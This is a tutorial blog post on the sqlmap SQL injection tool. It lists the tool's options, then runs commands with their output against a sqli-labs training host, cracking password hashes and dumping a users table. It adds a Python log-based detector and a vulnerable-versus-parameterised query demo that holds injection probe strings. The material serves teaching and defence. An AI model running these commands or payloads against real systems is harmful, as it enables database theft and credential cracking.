Hacking SQL injection with SQLmap – All things in moderation

Hacking SQL injection with SQLmap

SQLmap is one of the most powerful SQL injection automation tools, and it is written in Python. It automates detecting and exploiting SQL injection flaws in a database-backed application and extracting database names, tables, columns and all the data in the tables.

Features:

  1. Support for database management systems:
    • MySQL
    • Oracle
    • PostgreSQL
    • Microsoft SQL Server
    • Microsoft Access
    • SQLite
    • Firebird
    • Sybase
    • SAP MaxDB
    • DB2
  2. Full support for six SQL injection techniques:
    • Boolean-based blind
    • Time-based blind
    • Error-based
    • UNION query
    • Stacked queries
    • Out-of-band
  3. Support to connect directly to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  5. Automatic recognition of password hash formats and brute-forcing of the hashes using a dictionary.
  6. Support to dump database table entries.
  7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant column names contain strings like name and pass.
  8. Support to download and upload files from the database server’s underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Support to execute commands in a system shell on the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server’s underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session, as per the user’s choice.
  11. Support for escalating the database process’ user privileges via Metasploit’s Meterpreter getsystem command.

OPTIONS:

-u URL, --url=URL : Target URL
--user-agent=USER-AGENT : HTTP User-Agent header value to use for the connection
--cookie=COOKIE : HTTP Cookie header value to use for the connection
--method=METHOD : Force usage of the given HTTP method (e.g. GET, POST)
--data=DATA : Data to be sent through the HTTP POST method
-f, --fingerprint : Perform an extensive DBMS version fingerprint
-b, --banner : Retrieve the DBMS banner
--current-user : Retrieve the DBMS current user
--current-db : Retrieve the DBMS current database
--users : Enumerate DBMS users
--passwords : Enumerate DBMS users’ password hashes
--schema : Enumerate the DBMS schema
--dbs : Enumerate DBMS databases
--tables : Enumerate DBMS database tables
--columns : Enumerate DBMS database table columns
-D db_name : DBMS database(s) to enumerate
-T table_name : DBMS database table(s) to enumerate
-C column_name : DBMS database table column(s) to enumerate
--dump : Dump DBMS database table entries
--os-shell : Prompt for an interactive operating system shell
--os-cmd : Execute an operating system command
-v : Verbosity level

  • 0: Show only Python tracebacks, error and critical messages.
  • 1: Show also information and warning messages.
  • 2: Show also debug messages.
  • 3: Show also payloads injected.
  • 4: Show also HTTP requests.
  • 5: Show also HTTP responses’ headers.
  • 6: Show also HTTP responses’ page content.

Read more options: https://github.com/sqlmapproject/sqlmap/wiki/Usage
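The options above matter on the defending side as well: --user-agent means the scanner's default User-Agent can be replaced, so a detection rule should not rely on it alone. The following Python script is an added example, not part of the original post or of the SQLmap project. It parses a few constructed Apache combined-format access log lines and flags requests that either carry SQLmap's default "sqlmap/…" User-Agent or contain query-parameter values resembling the boolean-based, time-based, error-based, UNION or stacked-query techniques listed in the feature list. The log lines, IP addresses and version string are constructed, and the regular expressions are illustrative signatures, not SQLmap's own payload list.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" format:
#   ip ident user [time] "METHOD target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Illustrative indicators, keyed by the injection technique they usually belong to.
# Out-of-band injection is absent on purpose: its evidence shows up in DNS or
# outbound-connection logs of the database host, not in the web server log.
PAYLOAD_PATTERNS = {
    "union-query": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I),
    "boolean-blind": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time-blind": re.compile(r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.I),
    "error-based": re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML)\s*\(", re.I),
    "stacked-queries": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP|EXEC)\b", re.I),
}


def parse_line(line):
    """Return a dict with the log fields plus decoded query parameters, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qsl already percent-decodes once; decoding a second time catches
    # double-encoded values, which scanners sometimes use to slip past filters.
    entry["params"] = [(k, unquote_plus(v))
                       for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return entry


def indicators(entry):
    """Set of indicator names that apply to one parsed log entry."""
    found = set()
    if "sqlmap" in entry["ua"].lower():          # default UA looks like "sqlmap/<ver>#stable (...)"
        found.add("sqlmap-user-agent")
    for _, value in entry["params"]:
        for name, pattern in PAYLOAD_PATTERNS.items():
            if pattern.search(value):
                found.add(name)
    return found


def scan_log(lines):
    """Return (ip, path, sorted indicator list) for every line that has at least one indicator."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        found = indicators(entry)
        if found:
            hits.append((entry["ip"], entry["path"], sorted(found)))
    return hits


# Constructed sample log lines (IPs, timestamps and version string are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:19:47:11 +0000] "GET /sqli_labs/Less-1/?id=1 HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:19:47:12 +0000] "GET /sqli_labs/Less-1/?id=1%20AND%201%3D1 HTTP/1.1" '
    '200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [12/Mar/2024:19:47:13 +0000] '
    '"GET /sqli_labs/Less-1/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- HTTP/1.1" '
    '200 700 "-" "Mozilla/5.0 (custom)"',
    '10.0.0.9 - - [12/Mar/2024:19:47:14 +0000] "GET /sqli_labs/Less-1/?id=1%20AND%20SLEEP%285%29 HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (custom)"',
]

if __name__ == "__main__":
    for ip, path, names in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(names)}")
```

The second sample line is caught twice (User-Agent and a boolean probe); the third and fourth are caught only by their payloads because the User-Agent was changed, which is exactly the case --user-agent creates. A real deployment would also correlate by source IP and request rate, since a scanner issues hundreds of such requests per parameter.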

I. Example usage: SQLmap injection in a URL parameter

1. Fingerprint the back-end DBMS and enumerate the banner, current user, current database, all users and the users’ password hashes.

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=1 -f -b --current-db --current-user --users --passwords -v 1

Here is the output:

[19:47:11] [INFO] resumed: 5.1.41-3ubuntu12.6-log
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
               comment injection fingerprint: MySQL 5.1.41 
               banner parsing fingerprint: MySQL 5.1.41, logging enabled banner: '5.1.41-3ubuntu12.6-log' 
[19:47:11] [INFO] resumed: [email protected] 
current user: '[email protected]' 
[19:47:11] [INFO] resumed: security 
current database: 'security' 
database management system users [4]: 
[*] 'bricks'@'%' 
[*] 'bwapp'@'%' 
[*] 'citizens'@'localhost' 
[*] 'cryptomg'@'%' ' 
do you want to store hashes to a temporary file for eventual further processing with other tools
[y/N] y do you want to perform a dictionary-based attack against retrieved password hashes
[Y/n/q] y what dictionary do you want to use? 
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) 
[2] custom dictionary file 
[3] file with list of dictionary files 
> 
do you want to use common password suffixes? (slow!) [y/N] 
database management system users password hashes:                                                                                               
[*] bricks [1]:
    password hash: *73316569DAC7839C2A784FF263F5C0ABBC7086E2
[*] bwapp [1]:
    password hash: *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F
    clear-text password: user
[*] citizens [1]:
    password hash: *F70658E9BDD2910AC33ACDA164605DFC1DA70A68
    clear-text password: joomla
[*] cryptomg [1]:
    password hash: *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F
    clear-text password: user

2. Enumerate databases

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=11 --dbs -v 1

Here is the output:

[21:24:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[21:24:00] [INFO] fetching database names
[21:24:00] [WARNING] the SQL query provided does not return any output
[21:24:00] [INFO] the SQL query used returns 36 entries
available databases [4]:
[*] .svn
[*] bricks
[*] bwapp
[*] challenges

3. Get tables in a database

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=1 --tables -D bricks -v 1

Here is the output:

Database: bricks
[1 table]
+-------+
| users |
+-------+

4. Get columns of a table

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=1 --columns -T users -D bricks -v 1

Here is the output:

Database: bricks
Table: users
[8 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| email    | varchar(45)  |
| host     | varchar(45)  |
| idusers  | int(11)      |
| lang     | varchar(45)  |
| name     | varchar(45)  |
| password | varchar(45)  |
| ref      | varchar(145) |
| ua       | varchar(45)  |
+----------+--------------+
5. Dump data from table

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=1 -T users -D bricks --dump -v 1

Here is the output:

Database: bricks
Table: users
[4 entries]
+---------+---------------+---------------------------------------------+------+-------+-------------+---------------------+---------------------------------------------+
| idusers | ua            | ref                                         | lang | name  | host        | email               | password                                    |
+---------+---------------+---------------------------------------------+------+-------+-------------+---------------------+---------------------------------------------+
| 0       | Brick_Browser | http://owaspbwa/bricks/content-13/index.php | en   | admin | 127.0.0.1   | [email protected] | admin                                       |
| 1       | Block_Browser |                                             | en   | tom   | 8.8.8.8     | [email protected]   | tom                                         |
| 2       | Rain_Browser  |                                             | en   | ron   | 192.168.1.1 | [email protected]   | ron                                         |
| 3       | Mantra        |                                             | en   | harry | 127.0.0.1   | [email protected] | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------+---------------------------------------------+------+-------+-------------+---------------------+---------------------------------------------+
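All five steps above work through the id parameter of sqli-labs Less-1, so the defender's companion question is why that parameter is injectable and what the fix looks like. The Python below is an added example, not code from the original post or from sqli-labs. It builds an in-memory SQLite table modelled on the bricks.users dump (constructed rows with example.invalid addresses, only three of the eight columns), contrasts a lookup that pastes the raw id value into the SQL text with one that validates the value and binds it as a parameter, and shows the true/false response difference that boolean-based blind detection relies on.

```python
import sqlite3


def make_db():
    """Constructed stand-in for bricks.users; the rows are illustrative, not the dump above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (idusers INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (0, "admin", "admin@example.invalid"),
        (1, "tom", "tom@example.invalid"),
        (2, "ron", "ron@example.invalid"),
        (3, "harry", "harry@example.invalid"),
    ])
    return conn


def lookup_vulnerable(conn, user_id):
    """Less-1 style: the raw ?id= value becomes part of the SQL text.

    Any quote in user_id ends the literal and the rest is parsed as SQL.
    """
    sql = f"SELECT name FROM users WHERE idusers = '{user_id}' ORDER BY idusers"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user_id):
    """Hardened form: reject anything that is not an integer, then bind it as a parameter.

    The placeholder makes the driver send the value as data, never as SQL text,
    so even a value that slipped past validation could not change the query.
    """
    if not isinstance(user_id, str) or not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    rows = conn.execute("SELECT name FROM users WHERE idusers = ?", (int(user_id),))
    return [row[0] for row in rows]


def demo():
    """Run both lookups against a normal value and against crafted values."""
    conn = make_db()
    probe_all = "1' OR '1'='1"        # turns the WHERE clause into a tautology
    probe_true = "1' AND '1'='1"      # boolean-blind: same result as id=1 ...
    probe_false = "1' AND '1'='2"     # ... versus an empty result; the difference leaks information
    results = {
        "vulnerable_normal": lookup_vulnerable(conn, "1"),
        "vulnerable_all": lookup_vulnerable(conn, probe_all),
        "vulnerable_blind_true": lookup_vulnerable(conn, probe_true),
        "vulnerable_blind_false": lookup_vulnerable(conn, probe_false),
        "safe_normal": lookup_safe(conn, "1"),
    }
    try:
        lookup_safe(conn, probe_all)
        results["safe_probe"] = "accepted"
    except ValueError:
        results["safe_probe"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable lookup returns every user for the tautology and answers the two blind probes differently, which is all an automated scanner needs to extract data one bit at a time. The hardened version never reaches the database with a malformed id, and the bound parameter protects the query even for columns where the value legitimately is free text.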
